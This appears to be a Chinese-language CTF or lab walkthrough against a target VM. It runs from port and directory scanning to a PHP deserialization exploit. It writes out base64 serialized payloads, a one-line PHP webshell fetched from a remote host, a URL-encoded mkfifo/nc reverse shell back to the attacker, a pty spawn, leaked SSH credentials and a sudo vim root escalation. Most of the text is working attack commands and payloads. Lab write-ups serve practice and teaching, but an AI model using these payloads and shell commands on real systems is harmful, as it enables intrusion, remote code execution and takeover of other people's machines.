kali:192.168.153.128
信息搜集:
靶机IP: 192.168.153.130
nmap 全端口详细扫描
访问http:
目录扫描:
dirb http://192.168.153.130
访问: http://192.168.153.130/backup/
可以下载下来一个 压缩包: 解压后是三个php文件 网页源代码的文件
要利用反序列化攻克
构造payload: 序列化->base编码
Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==
尝试上传一句话木马:
先在自己本地开启网站 比如使用小皮面板 弄一个2.txt
<?php @system($_GET['cmd']);?>
构造payload: 要把空格替换成 \x00
O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:24:"http://172.16.1.16/2.txt";}}
base64编码:
Tzo0OiJVc2VyIjoyOntzOjQ6Im5hbWUiO3M6Mzoic2s0IjtzOjM6IndlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjQ6Imh0dHA6Ly8xNzIuMTYuMS4xNi8yLnR4dCI7fX0=
kali监听4444端口:
nc -lvvp 4444
反弹shell:
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.153.128+4444+>/tmp/f
成功!
使用python终端:
python3 -c 'import pty; pty.spawn("/bin/bash")'
提权:
在更目录发现:
credentials.txt.bak
这个可能是ssh 的账号密码 尝试登录:
sk4
KywZmnPWW6tTbW5w
登录成功!
找到第一个flag:
查看sudo -l: 发现有vim
sudo 提权
sudo vim
在命令行模式 输入
:!bash
成功提权!
进入root目录:
找到最终flag